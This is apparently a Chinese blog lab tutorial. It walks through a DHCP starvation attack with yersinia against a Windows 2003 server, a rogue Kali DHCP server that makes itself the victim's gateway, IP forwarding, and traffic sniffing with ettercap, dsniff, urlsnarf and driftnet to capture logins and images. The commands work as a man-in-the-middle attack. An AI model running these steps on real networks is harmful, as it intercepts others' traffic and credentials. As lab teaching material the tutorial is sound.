首先我们说一下什么是DHCP?
DHCP(Dynamic Host Configuration Protocol,动态地址解析协议)是IETF为实现IP的自动配置而设计的协议,其可以为客户机自动分配IP地址、子网掩码以及缺省网关、DNS服务器的IP地址等参数;
本次实验模拟真实环境,使用kali架设DHCP服务器并且使用yersinia发起dhcp攻击,侵占win2003服务器的地址池。
实战
首先取消勾选DHCP自动分配,如下图:
配置dns和dhcp服务器;具体操作见我之前写的博客
配置kali攻击机
安装yersinia(用于欺骗攻击)和isc-dhcp-server(假设DHCP服务器)
┌──(root💀kali)-[~]
└─# apt install yersinia
┌──(root💀kali)-[~]
└─# apt install isc-dhcp-server
启动yersinia
┌──(root💀kali)-[~]
└─# yersinia -G
修改dhcp服务器配置文件,设置目标主机连接的相关IP信息(注意网关地址是kali的IP地址)
修改项:IP地址,子网掩码、分配范围、广播地址、网关改为kali的IP地址
┌──(root💀kali)-[~]
└─# vim /etc/dhcp/dhcpd.conf
创建DHCP服务器地址池文件
┌──(root💀kali)-[~]
└─# touch /var/lib/dhcp/dhcpd.leases
运行dhcp地址池文件并创建
┌──(root💀kali)-[~]
└─# dhcpd -cf /etc/dhcp/dhcpd.conf
如果出现上图问题 ,则需要关闭进程之后再运行一遍命令
查看进程
┌──(root💀kali)-[~]
└─# ps -ef
┌──(root💀kali)-[~]
└─# kill 1422
再次运行以下命令,则成功创立地址池
win2003DHCP服务器地址池有空余地址
之后一切准备就绪,则使用yersinia侵占win2003地址池
之后查看win2003地址池发现ip已占满(右键-显示统计信息)
打开win7虚拟机
ipconfig /release 释放地址
ipconfig /renew 重新获取地址
上面我们可以看到默认网关为kali地址并给也已经分配了地址
注意:如果其他操作都正常 win7任然获取不到地址,那么就关掉yersinia软件停止占用(前提是win2003地址池已经占用完);之后重新再获取win7地址等待就可
之后如果想连外网,则需开启网络转发功能
┌──(root💀kali)-[~]
└─# echo 1 > /proc/sys/net/ipv4/ip_forward
默认ip_forward文件中为0是关闭网络转发功能的
附加:嗅探win7流量
ettercap -Tq -i eth0
分别发送邮件或者使用inurl:管理后台,找个http 的登录后台进行登录,可以看到相关信息
driftnet -i eth0 从流量里面获取图片
urlsnarf -i eth0 从流量里面获取
dsniff -i eth0 嗅探telnet ftp等登录信息
Successful!